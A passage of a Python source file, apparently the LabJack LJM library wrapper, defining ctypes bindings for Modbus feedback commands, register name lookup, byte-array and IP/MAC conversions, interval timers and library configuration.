            labjack.ljm.constants module.
        aWrites: A list of size numFrames of the direction/access
            direction/access type (labjack.ljm.constants.READ or
            labjack.ljm.constants.WRITE) for each frame.
        aNumValues: A list of size numFrames giving the number of values
            to read/write for each frame.
        aValues: A list of values to write. Needs to be the length of
            the sum of the aNumValues list's values. Values
            corresponding to writes are written.
        numFrames: The number of frames to be created, which should be
            the length of aAddresses/aTypes/aWrites/aNumValues or less.
        aMBFBCommand: The Feedback command to be passed. This should be
            at least the size maxBytesPerMBFB. Default is None, which
            creates this list with size maxBytesPerMBFB. Transaction ID
            and Unit ID will be blanks that mbfbComm will fill in.
    Returns:
        A tuple containing:
        (numFrames, aMBFBCommand)
        numFrames: The number of frames created.
        aMBFBCommand: A list representing the Modbus Feedback command.
    Raises:
        LJMError: An error was returned from the LJM library call.
    Notes:
        For every entry in aWrites[i] that is
        labjack.ljm.constants.WRITE, aValues contains aNumValues[i]
        values to write and for every entry in aWrites that is
        labjack.ljm.constants.READ, aValues contains aNumValues[i]
        values that will later be updated in the updateValues function.
        aValues values must be in the same order as the rest of the
        lists. For example, if aWrite is:
            [labjack.ljm.constants.WRITE, labjack.ljm.constants.READ,
            labjack.ljm.constants.WRITE]
        and aNumValues is:
            [1, 4, 2]
        aValues would have one value to be written, then 4 blank/garbage
        values, and then 2 values to be written.
    """
    cMaxBytes = ctypes.c_int32(maxBytesPerMBFB)
    cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
    cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
    cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    # numFrames is in/out: the C call updates it with the frames created.
    cNumFrames = ctypes.c_int32(numFrames)
    if aMBFBCommand is None:
        # Allocate a zeroed command buffer of the maximum allowed size.
        cComm = (ctypes.c_ubyte*maxBytesPerMBFB)()
    else:
        cComm = _convertListToCtypeArray(aMBFBCommand, ctypes.c_ubyte)
    error = _staticLib.LJM_AddressesToMBFB(cMaxBytes, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cWrites), ctypes.byref(cNumVals), ctypes.byref(cVals), ctypes.byref(cNumFrames), ctypes.byref(cComm))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cNumFrames.value, _convertCtypeArrayToList(cComm)
def mbfbComm(handle, unitID, aMBFB):
    """Sends a Modbus Feedback command and receives a Feedback response,
    and parses the response for obvious errors. This function adds its
    own Transaction ID to the command.
    Args:
        handle: A valid handle to an open device.
        unitID: The ID of the specific unit that the Modbus Feedback
            command should be sent to. Primarily used for LabJack Mote
            communication.
        aMBFB: A list that is the Modbus Feedback command to send. This
            must also be a size large enough for the Feedback response.
    Returns:
        A list that is the Modbus Feedback response.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cUnitID = ctypes.c_ubyte(unitID)
    cMBFB = _convertListToCtypeArray(aMBFB, ctypes.c_ubyte)
    cErrorAddr = ctypes.c_int32(-1)
    # Pass the converted c_ubyte unit ID. Previously the raw Python int was
    # passed and cUnitID was unused, bypassing the intended 8-bit conversion.
    error = _staticLib.LJM_MBFBComm(handle, cUnitID, ctypes.byref(cMBFB), ctypes.byref(cErrorAddr))
    if error != errorcodes.NOERROR:
        errAddr = cErrorAddr.value
        if errAddr == -1:
            # -1 means no specific register address is associated with the error.
            errAddr = None
        raise LJMError(error, errAddr)
    return _convertCtypeArrayToList(cMBFB)
def updateValues(aMBFBResponse, aDataTypes, aWrites, aNumValues, numFrames, aValues=None):
    """Takes a Modbus Feedback response from a device and the lists
    corresponding the Feedback command, and returns the converted
    response values.
    Args:
        aMBFBResponse: The Modbus Feedback response byte list from the
            device.
        aDataTypes: The list of data types read/written.
        aWrites: The list of read/write directions.
        aNumValues: The list of how many values were read/written.
        numFrames: The number of frames read/written.
        aValues: A list of values to pass. This should be at least the
            sum of the values in the aNumValues list. Default is None,
            which creates this list with a size of the sum of the values
            in the aNumValues list.
    Returns:
        A list of converted float values from the Modbus Feedback
        response.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cMBFB = _convertListToCtypeArray(aMBFBResponse, ctypes.c_ubyte)
    cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
    cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
    cNumFrames = ctypes.c_int32(numFrames)
    if aValues is None:
        # One output slot per value across all frames, zero-initialized.
        cVals = (ctypes.c_double*(sum(aNumValues)))()
    else:
        cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    error = _staticLib.LJM_UpdateValues(ctypes.byref(cMBFB), ctypes.byref(cTypes), ctypes.byref(cWrites), ctypes.byref(cNumVals), cNumFrames, ctypes.byref(cVals))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _convertCtypeArrayToList(cVals)
def namesToAddresses(numFrames, aNames, aAddresses=None, aDataTypes=None):
    """Takes a list of Modbus register names and returns two lists
    containing the corresponding addresses and data types.
    Args:
        numFrames: The number of names in aNames, and minimum size of
            aAddresses and aDataTypes if not set to None.
        aNames: List of strings containing the register name or register
            alternate name.
        aAddresses: List of addresses to pass. This should be at least
            the size numFrames. Default is None, which creates this list
            with size of numFrames and filled with zeros.
        aDataTypes: List of data types to pass. This should be at least
            the size numFrames. Default is None, which creates this list
            with size of numFrames and filled with zeros.
    Returns:
        A tuple containing:
        (aAddresses, aDataTypes)
        aAddresses: A list of addresses corresponding to the register
            names list.
        aDataTypes: A list of data types corresponding to the register
            names list.
    Raises:
        TypeError: names is not a list of strings.
        LJMError: An error was returned from the LJM library call.
    Note: For each register identifier in aNames that is invalid, the
        corresponding aAddresses value will be set to
        labjack.ljm.constants.INVALID_NAME_ADDRESS.
    """
    cNumFrames = ctypes.c_int32(numFrames)
    # The C API expects ASCII byte strings, so encode each name up front.
    asciiNames = []
    for x in aNames:
        if not isinstance(x, str):
            raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
        asciiNames.append(x.encode("ascii"))
    cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
    if aAddresses is None:
        cAddrs = (ctypes.c_int32*numFrames)()
    else:
        cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    if aDataTypes is None:
        cTypes = (ctypes.c_int32*numFrames)()
    else:
        cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    error = _staticLib.LJM_NamesToAddresses(cNumFrames, ctypes.byref(cNames), ctypes.byref(cAddrs), ctypes.byref(cTypes))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _convertCtypeArrayToList(cAddrs), _convertCtypeArrayToList(cTypes)
def nameToAddress(name):
    """Takes a Modbus register name and returns the corresponding
    address and data type values.
    Args:
        name: Register name string.
    Returns:
        A tuple containing:
        (address, dataType)
        address: Address value corresponding to the register name.
        dataType: Data type value corresponding to the register name.
    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    # Out-parameters filled in by the C call.
    address = ctypes.c_int32(0)
    dataType = ctypes.c_int32(0)
    err = _staticLib.LJM_NameToAddress(name.encode("ascii"), ctypes.byref(address), ctypes.byref(dataType))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return address.value, dataType.value
def addressesToTypes(numAddresses, aAddresses):
    """Takes a list of Modbus register addresses and returns their data
    types.
    Args:
        numAddresses: The number of addresses you want the data types
            of.
        aAddresses: A list of the Modbus register addresses you want the
            data types of.
    Returns:
        A list of data types corresponding to the address list.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cNumAddrs = ctypes.c_int32(numAddresses)
    cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    # Zero-initialized output array, one data type per address.
    cTypes = (ctypes.c_int32*numAddresses)()
    error = _staticLib.LJM_AddressesToTypes(cNumAddrs, ctypes.byref(cAddrs), ctypes.byref(cTypes))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _convertCtypeArrayToList(cTypes)
def addressToType(address):
    """Takes a Modbus register address and returns its data type.
    Args:
        address: The Modbus register address you want the data type of.
    Returns:
        The data type of the address.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    # Out-parameter filled in by the C call.
    dataType = ctypes.c_int32(0)
    err = _staticLib.LJM_AddressToType(ctypes.c_int32(address), ctypes.byref(dataType))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return dataType.value
def lookupConstantValue(scope, constantName):
    """Takes a register name or other scope and a constant name, and
    returns the constant value.
    Args:
        scope: The register name or other scope string to search within.
        constantName: The name of the constant string to search for.
    Returns:
        The constant value from the given scope, if found.
    Raises:
        TypeError: scope or constantName is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(scope, str):
        raise TypeError("Expected a string instead of " + str(type(scope)) + ".")
    if not isinstance(constantName, str):
        raise TypeError("Expected a string instead of " + str(type(constantName)) + ".")
    # Out-parameter filled in by the C call.
    cConstVal = ctypes.c_double(0)
    error = _staticLib.LJM_LookupConstantValue(scope.encode("ascii"), constantName.encode("ascii"), ctypes.byref(cConstVal))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cConstVal.value
def lookupConstantName(scope, constantValue):
    """Takes a register name or other scope and a value, and returns the
    name of that value.
    Args:
        scope: The register name or other scope string to search within.
        constantValue: The constant value integer to search for.
    Returns:
        The constant name from the given scope, if found.
    Raises:
        TypeError: scope is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(scope, str):
        raise TypeError("Expected a string instead of " + str(type(scope)) + ".")
    cConstVal = ctypes.c_double(constantValue)
    # Pre-allocate a NUL-filled byte buffer the C call writes the name into.
    cConstName = ("\0"*constants.MAX_NAME_SIZE).encode("ascii")
    error = _staticLib.LJM_LookupConstantName(scope.encode("ascii"), cConstVal, cConstName)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _decodeASCII(cConstName)
def errorToString(errorCode):
    """Returns the name of an error code.
    Args:
        errorCode: The error code to look up.
    Returns:
        The error name string.
    Note:
        If the constants file that has been loaded does not contain
        errorCode, this returns a message saying so. If the constants
        file could not be opened, this returns a string saying so and
        where that constants file was expected to be.
    """
    cErr = ctypes.c_int32(errorCode)
    # Pre-allocate a NUL-filled byte buffer the C call writes the name into.
    errStr = ("\0"*constants.MAX_NAME_SIZE).encode("ascii")
    _staticLib.LJM_ErrorToString(cErr, errStr)
    return _decodeASCII(errStr)
def loadConstants():
    """Manually loads or reloads the constants files associated with
    the errorToString and namesToAddresses functions.
    Note:
        This step is handled automatically. This function does not
        need to be called before either errorToString or
        namesToAddresses.
    """
    _staticLib.LJM_LoadConstants()
def loadConstantsFromFile(fileName):
    """Loads the constants file from the given file name. Alias for
    executing:
        writeLibraryConfigStringS(labjack.ljm.constants.CONSTANTS_FILE,
                                  fileName)
    Args:
        fileName: A file name string using relative or absolute path
            to pass to writeLibraryConfigStringS.
    Raises:
        TypeError: fileName is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(fileName, str):
        raise TypeError("Expected a string instead of " + str(type(fileName)) + ".")
    error = _staticLib.LJM_LoadConstantsFromFile(fileName.encode("ascii"))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def loadConstantsFromString(jsonString):
    """Parses jsonString as the constants file and loads it.
    Args:
        jsonString: A JSON string containing a "registers" array and/or
            an "errors" array.
    Raises:
        TypeError: jsonString is not a string.
        LJMError: An error was returned from the LJM library call.
    Note:
        If the JSON string does not contain a "registers" array, the
        Modbus-related constants are not affected. Similarly, if the
        JSON string does not contain an "errors" array, the errorcode-
        related constants are not affected.
    """
    if not isinstance(jsonString, str):
        raise TypeError("Expected a string instead of " + str(type(jsonString)) + ".")
    error = _staticLib.LJM_LoadConstantsFromString(jsonString.encode("ascii"))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def tcVoltsToTemp(tcType, tcVolts, cjTempK):
    """Converts thermocouple voltage to a temperature.
    Args:
        tcType: The thermocouple type. See "Thermocouple Type constants"
            in labjack.ljm.constants (ttX).
        tcVolts: The voltage reported by the thermocouple.
        cjTempK: The cold junction temperature in degrees Kelvin.
    Returns:
        The calculated temperature in degrees Kelvin.
    Raises:
        LJMError: An error was returned from the LJM library call.
    Note:
        B-type measurements below ~373 degrees Kelvin or ~0.04
        millivolts (at a cold junction temperature of 273.15
        degrees Kelvin) may be inaccurate.
    """
    cTCType = ctypes.c_int32(tcType)
    cTCVolts = ctypes.c_double(tcVolts)
    cCJTempK = ctypes.c_double(cjTempK)
    # Out-parameter filled in by the C call.
    cTCTempK = ctypes.c_double(0)
    error = _staticLib.LJM_TCVoltsToTemp(cTCType, cTCVolts, cCJTempK, ctypes.byref(cTCTempK))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cTCTempK.value
def float32ToByteArray(aFLOAT32, registerOffset=0, numFLOAT32=None, aBytes=None):
    """Converts a list of values from 32-bit floats to bytes
    (big-endian).
    Args:
        aFLOAT32: The list of 32-bit float values to be converted.
        registerOffset: The register offset to put the converted values
            in aBytes. Default is 0.
        numFLOAT32: The number of values to convert. Default is None
            and will be set to the list length of aFLOAT32.
        aBytes: Byte list to pass. It should be at least
            registerOffset*2 + numFLOAT32*4 in size. Default is None,
            which creates a list of the correct size filled with zeros.
    Returns:
        A list of converted values in byte form.
    """
    cFloats = _convertListToCtypeArray(aFLOAT32, ctypes.c_float)
    cRegOffset = ctypes.c_int32(registerOffset)
    if numFLOAT32 is None:
        numFLOAT32 = len(cFloats)
    cNumFloat = ctypes.c_int32(numFLOAT32)
    # Each Modbus register is 2 bytes and each float32 value is 4 bytes.
    numBytes = numFLOAT32*4 + registerOffset*2
    if aBytes is None:
        aBytes = [0]*numBytes
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    _staticLib.LJM_FLOAT32ToByteArray(ctypes.byref(cFloats), cRegOffset, cNumFloat, ctypes.byref(cUbytes))
    return _convertCtypeArrayToList(cUbytes)
def byteArrayToFLOAT32(aBytes, registerOffset=0, numFLOAT32=None, aFLOAT32=None):
    """Converts a list of values from bytes (big-endian) to 32-bit
    floats.
    Args:
        aBytes: The bytes to be converted.
        registerOffset: The register offset to get the values from in
            aBytes. Default is 0.
        numFLOAT32: The number of 32-bit float values to convert.
            Default is None, and will be the length of the aBytes list
            divided by 4.
        aFLOAT32: Float list to pass. It should be at least numFLOAT32
            in size. Default is None, which creates a list of the
            correct size filled with zeros.
    Returns:
        A list of converted values in float form.
    """
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    cRegOffset = ctypes.c_int32(registerOffset)
    # Maximum floats available after skipping registerOffset registers
    # (2 bytes each); each float32 consumes 4 bytes.
    maxNum = int((len(cUbytes)-registerOffset*2)/4)
    if numFLOAT32 is None:
        numFLOAT32 = maxNum
    cNumFloat = ctypes.c_int32(numFLOAT32)
    if aFLOAT32 is None:
        aFLOAT32 = [0]*numFLOAT32
    cFloats = _convertListToCtypeArray(aFLOAT32, ctypes.c_float)
    _staticLib.LJM_ByteArrayToFLOAT32(ctypes.byref(cUbytes), cRegOffset, cNumFloat, ctypes.byref(cFloats))
    return _convertCtypeArrayToList(cFloats)
def uint16ToByteArray(aUINT16, registerOffset=0, numUINT16=None, aBytes=None):
    """Converts a list of values from 16-bit unsigned integers to bytes
    (big-endian).
    Args:
        aUINT16: The list of 16-bit unsigned integer values to be
            converted.
        registerOffset: The register offset to put the converted values
            in aBytes. Default is 0.
        numUINT16: The number of values to convert. Default is None
            and will be set to the list length of aUINT16.
        aBytes: Byte list to pass. It should be at least
            registerOffset*2 + numUINT16*2 in size. Default is None,
            which creates a list of the correct size filled with zeros.
    Returns:
        A list of converted values in byte form.
    """
    cUint16s = _convertListToCtypeArray(aUINT16, ctypes.c_uint16)
    cRegOffset = ctypes.c_int32(registerOffset)
    if numUINT16 is None:
        numUINT16 = len(cUint16s)
    cNumUint16 = ctypes.c_int32(numUINT16)
    # Each Modbus register is 2 bytes and each uint16 value is 2 bytes.
    numBytes = numUINT16*2 + registerOffset*2
    if aBytes is None:
        aBytes = [0]*numBytes
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    _staticLib.LJM_UINT16ToByteArray(ctypes.byref(cUint16s), cRegOffset, cNumUint16, ctypes.byref(cUbytes))
    return _convertCtypeArrayToList(cUbytes)
def byteArrayToUINT16(aBytes, registerOffset=0, numUINT16=None, aUINT16=None):
    """Converts a list of values from bytes (big-endian) to 16-bit
    unsigned integers.
    Args:
        aBytes: The bytes to be converted.
        registerOffset: The register offset to get the values from in
            aBytes. Default is 0.
        numUINT16: The number of 16-bit unsigned integer values to
            convert. Default is None, and will be the length of the
            aBytes list divided by 2.
        aUINT16: 16-bit unsigned integer list to pass. It should be
            at least numUINT16 in size. Default is None, which
            creates a list of the correct size filled with zeros.
    Returns:
        A list of converted values in 16-bit unsigned integer form.
    """
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    cRegOffset = ctypes.c_int32(registerOffset)
    # Maximum uint16 values available after skipping registerOffset
    # registers (2 bytes each); each uint16 consumes 2 bytes.
    maxNum = int((len(cUbytes)-registerOffset*2)/2)
    if numUINT16 is None:
        numUINT16 = maxNum
    cNumUint16 = ctypes.c_int32(numUINT16)
    if aUINT16 is None:
        aUINT16 = [0]*numUINT16
    cUint16s = _convertListToCtypeArray(aUINT16, ctypes.c_uint16)
    _staticLib.LJM_ByteArrayToUINT16(ctypes.byref(cUbytes), cRegOffset, cNumUint16, ctypes.byref(cUint16s))
    return _convertCtypeArrayToList(cUint16s)
def uint32ToByteArray(aUINT32, registerOffset=0, numUINT32=None, aBytes=None):
    """Converts a list of values from 32-bit unsigned integers to bytes
    (big-endian).
    Args:
        aUINT32: The list of 32-bit unsigned integer values to be
            converted.
        registerOffset: The register offset to put the converted values
            in aBytes. Default is 0.
        numUINT32: The number of values to convert. Default is None
            and will be set to the list length of aUINT32.
        aBytes: Byte list to pass. It should be at least
            registerOffset*2 + numUINT32*4 in size. Default is None,
            which creates a list of the correct size filled with
            zeros.
    Returns:
        A list of converted values in byte form.
    """
    cUint32s = _convertListToCtypeArray(aUINT32, ctypes.c_uint32)
    cRegOffset = ctypes.c_int32(registerOffset)
    if numUINT32 is None:
        numUINT32 = len(cUint32s)
    cNumUint32 = ctypes.c_int32(numUINT32)
    # Each Modbus register is 2 bytes and each uint32 value is 4 bytes.
    numBytes = numUINT32*4 + registerOffset*2
    if aBytes is None:
        aBytes = [0]*numBytes
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    _staticLib.LJM_UINT32ToByteArray(ctypes.byref(cUint32s), cRegOffset, cNumUint32, ctypes.byref(cUbytes))
    return _convertCtypeArrayToList(cUbytes)
def byteArrayToUINT32(aBytes, registerOffset=0, numUINT32=None, aUINT32=None):
    """Converts a list of values from bytes (big-endian) to 32-bit
    unsigned integers.
    Args:
        aBytes: The bytes to be converted.
        registerOffset: The register offset to get the values from in
            aBytes. Default is 0.
        numUINT32: The number of 32-bit unsigned integer values to
            convert. Default is None, and will be the length of the
            aBytes list divided by 4.
        aUINT32: 32-bit unsigned integer list to pass. It should be
            at least numUINT32 in size. Default is None, which
            creates a list of the correct size filled with zeros.
    Returns:
        A List of converted values in 32-bit unsigned integer
        form.
    """
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    cRegOffset = ctypes.c_int32(registerOffset)
    # Maximum uint32 values available after skipping registerOffset
    # registers (2 bytes each); each uint32 consumes 4 bytes.
    maxNum = int((len(cUbytes)-registerOffset*2)/4)
    if numUINT32 is None:
        numUINT32 = maxNum
    cNumUint32 = ctypes.c_int32(numUINT32)
    if aUINT32 is None:
        aUINT32 = [0]*numUINT32
    cUint32s = _convertListToCtypeArray(aUINT32, ctypes.c_uint32)
    _staticLib.LJM_ByteArrayToUINT32(ctypes.byref(cUbytes), cRegOffset, cNumUint32, ctypes.byref(cUint32s))
    return _convertCtypeArrayToList(cUint32s)
def int32ToByteArray(aINT32, registerOffset=0, numINT32=None, aBytes=None):
    """Converts a list of values from 32-bit signed integers to bytes
    (big-endian).
    Args:
        aINT32: The list of 32-bit signed integer values to be
            converted.
        registerOffset: The register offset to put the converted values
            in aBytes. Default is 0.
        numINT32: The number of values to convert. Default is None and
            will be set to the list length of aINT32.
        aBytes: Byte list to pass. It should be at least
            registerOffset*2 + numINT32*4 in size. Default is None,
            which creates a byte list of the correct size filled with
            zeros.
    Returns:
        A list of converted values in byte form.
    """
    cInt32s = _convertListToCtypeArray(aINT32, ctypes.c_int32)
    cRegOffset = ctypes.c_int32(registerOffset)
    if numINT32 is None:
        numINT32 = len(cInt32s)
    cNumInt32 = ctypes.c_int32(numINT32)
    # Each Modbus register is 2 bytes and each int32 value is 4 bytes.
    numBytes = numINT32*4 + registerOffset*2
    if aBytes is None:
        aBytes = [0]*numBytes
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    _staticLib.LJM_INT32ToByteArray(ctypes.byref(cInt32s), cRegOffset, cNumInt32, ctypes.byref(cUbytes))
    return _convertCtypeArrayToList(cUbytes)
def byteArrayToINT32(aBytes, registerOffset=0, numINT32=None, aINT32=None):
    """Converts a list of values from bytes (big-endian) to 32-bit
    signed integers.
    Args:
        aBytes: The bytes to be converted.
        registerOffset: The register offset to get the values from in
            aBytes. Default is 0.
        numINT32: The number of 32-bit signed integer values to convert.
            Default is None, and will be the length of the aBytes list
            divided by 4.
        aINT32: 32-bit signed integer list to pass. It should be
            at least numINT32 in size. Default is None, which
            creates a list of the correct size filled with zeros.
    Returns:
        A List of converted values in 32-bit signed integer form.
    """
    cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
    cRegOffset = ctypes.c_int32(registerOffset)
    # Maximum int32 values available after skipping registerOffset
    # registers (2 bytes each); each int32 consumes 4 bytes.
    maxNum = int((len(cUbytes)-registerOffset*2)/4)
    if numINT32 is None:
        numINT32 = maxNum
    cNumInt32 = ctypes.c_int32(numINT32)
    if aINT32 is None:
        aINT32 = [0]*numINT32
    cInt32s = _convertListToCtypeArray(aINT32, ctypes.c_int32)
    _staticLib.LJM_ByteArrayToINT32(ctypes.byref(cUbytes), cRegOffset, cNumInt32, ctypes.byref(cInt32s))
    return _convertCtypeArrayToList(cInt32s)
def numberToIP(number):
    """Takes an integer representing an IPv4 address and returns the
    corresponding decimal-dot IPv4 address as a string.
    Args:
        number: The numerical representation of an IP address to be
            converted to a string representation.
    Returns:
        The converted string representation of the IP address.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cNum = ctypes.c_uint32(number)
    # Pre-allocate a NUL-filled byte buffer the C call writes the string into.
    ipv4String = ("\0"*constants.IPv4_STRING_SIZE).encode("ascii")
    error = _staticLib.LJM_NumberToIP(cNum, ipv4String)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _decodeASCII(ipv4String)
def ipToNumber(ipv4String):
    """Takes a decimal-dot IPv4 string representing an IPv4 address and
    returns the corresponding integer version of the address.
    Args:
        ipv4String: The string representation of the IP address to be
            converted to a numerical representation.
    Returns:
        The numerical representation of ipv4String.
    Raises:
        TypeError: ipv4String is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(ipv4String, str):
        raise TypeError("Expected a string instead of " + str(type(ipv4String)) + ".")
    # Pad with NULs so the buffer handed to the C call is full size.
    if len(ipv4String) < constants.IPv4_STRING_SIZE:
        ipv4String += "\0"*(constants.IPv4_STRING_SIZE-len(ipv4String))
    cNum = ctypes.c_uint32(0)
    error = _staticLib.LJM_IPToNumber(ipv4String.encode("ascii"), ctypes.byref(cNum))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cNum.value
def numberToMAC(number):
    """Takes an integer representing a MAC address and outputs the
    corresponding hex-colon MAC address as a string.
    Args:
        number: The numerical representation of a MAC address to be
            converted to a string representation.
    Returns:
        The string representation of the MAC address after the
        completion of this function.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cNum = ctypes.c_uint64(number)
    # Pre-allocate a NUL-filled byte buffer the C call writes the string into.
    macString = ("\0"*constants.MAC_STRING_SIZE).encode("ascii")
    # Declare argtypes so the 64-bit value is marshalled correctly, and pass
    # the converted c_uint64 (previously the raw Python int was passed and
    # cNum was unused).
    _staticLib.LJM_NumberToMAC.argtypes = [ctypes.c_uint64, ctypes.c_char_p]
    error = _staticLib.LJM_NumberToMAC(cNum, macString)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return _decodeASCII(macString)
def macToNumber(macString):
    """Takes a hex-colon string representing a MAC address and outputs
    the corresponding integer version of the address.
    Args:
        macString: The string representation of the MAC address to be
            converted to a numerical representation.
    Returns:
        The numerical representation of macString.
    Raises:
        TypeError: macString is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(macString, str):
        raise TypeError("Expected a string instead of " + str(type(macString)) + ".")
    # Pad with NULs so the buffer handed to the C call is full size.
    if len(macString) < constants.MAC_STRING_SIZE:
        macString += "\0"*(constants.MAC_STRING_SIZE-len(macString))
    cNum = ctypes.c_uint64(0)
    error = _staticLib.LJM_MACToNumber(macString.encode("ascii"), ctypes.byref(cNum))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cNum.value
def getHostTick():
    """Queries the host system's steady (monotonic) clock,
    preferentially with high precision.
    Returns:
        The current clock tick in microseconds.
    """
    tickFunc = _staticLib.LJM_GetHostTick
    # Declare the 64-bit return type so ctypes does not truncate to int.
    tickFunc.restype = ctypes.c_uint64
    return tickFunc()
def getHostTick32Bit():
    """Queries the host system's steady (monotonic) clock,
    preferentially with high precision, but returns two 32-bit integers
    for the 64-bit clock tick.
    Returns:
        A tuple containing:
        (tickUpper, tickLower)
        tickUpper: The upper (most significant) 32 bits of the clock
            tick.
        tickLower: The lower (least significant) 32 bits of the clock
            tick.
    """
    # Out-parameters filled in by the C call with each half of the tick.
    upperBits = ctypes.c_uint32(0)
    lowerBits = ctypes.c_uint32(0)
    _staticLib.LJM_GetHostTick32Bit(ctypes.byref(upperBits), ctypes.byref(lowerBits))
    return upperBits.value, lowerBits.value
def startInterval(intervalHandle, microseconds):
    """Allocates memory for the given intervalHandle and begins a
    reoccurring interval timer. This function does not wait.
    Args:
        intervalHandle: The user-generated interval identifier.
        microseconds: The number of microseconds in the interval.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    err = _staticLib.LJM_StartInterval(
        ctypes.c_int32(intervalHandle),
        ctypes.c_int32(microseconds),
    )
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def waitForNextInterval(intervalHandle):
    """Waits (blocks/sleeps) until the next interval occurs. If
    intervals are skipped, this function still waits until the next
    complete interval.
    Args:
        intervalHandle: The user-generated interval identifier.
    Returns:
        The number of skipped intervals.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    # Out-parameter filled in by the C call with the skipped-interval count.
    skipped = ctypes.c_int32(0)
    err = _staticLib.LJM_WaitForNextInterval(ctypes.c_int32(intervalHandle), ctypes.byref(skipped))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return skipped.value
def cleanInterval(intervalHandle):
    """Cleans/deallocates memory for the given intervalHandle.
    Args:
        intervalHandle: The user-generated interval identifier.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    err = _staticLib.LJM_CleanInterval(ctypes.c_int32(intervalHandle))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def writeLibraryConfigS(parameter, value):
    """Writes/sets a library configuration/setting.
    Args:
        parameter: Name of the configuration value you want to set.
            Needs to be a string and is not case-sensitive.
        value: The config value.
    Raises:
        TypeError: parameter is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    # Use "not isinstance" for consistency with the other config functions
    # (was the un-idiomatic "isinstance(...) is False").
    if not isinstance(parameter, str):
        raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
    cVal = ctypes.c_double(value)
    error = _staticLib.LJM_WriteLibraryConfigS(parameter.encode("ascii"), cVal)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def writeLibraryConfigStringS(parameter, string):
    """Writes/sets a string-valued library configuration/setting.

    Args:
        parameter: Name of the configuration value you want to set.
            Needs to be a string and is not case-sensitive.
        string: The config value string. Must not be of size greater
            than labjack.ljm.constants.MAX_NAME_SIZE

    Raises:
        TypeError: parameter or string is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    # Validate in the same order as before: parameter, then string.
    for arg in (parameter, string):
        if not isinstance(arg, str):
            raise TypeError("Expected a string instead of " + str(type(arg)) + ".")
    err = _staticLib.LJM_WriteLibraryConfigStringS(parameter.encode("ascii"), string.encode("ascii"))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def readLibraryConfigS(parameter):
    """Reads a numeric configuration/setting value from the library.

    Args:
        parameter: Name of the configuration value you want to read.
            Needs to be a string and is not case-sensitive.

    Returns:
        The read config value as a float.

    Raises:
        TypeError: parameter is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(parameter, str):
        raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
    result = ctypes.c_double(0)
    err = _staticLib.LJM_ReadLibraryConfigS(parameter.encode("ascii"), ctypes.byref(result))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return result.value
def readLibraryConfigStringS(parameter):
    """Reads a configuration/setting string from the library.

    Args:
        parameter: Name of the configuration value you want to read.
            Needs to be a string and is not case-sensitive.

    Returns:
        The read config string.

    Raises:
        TypeError: parameter is not a string.
        LJMError: An error was returned from the LJM library call.
    """
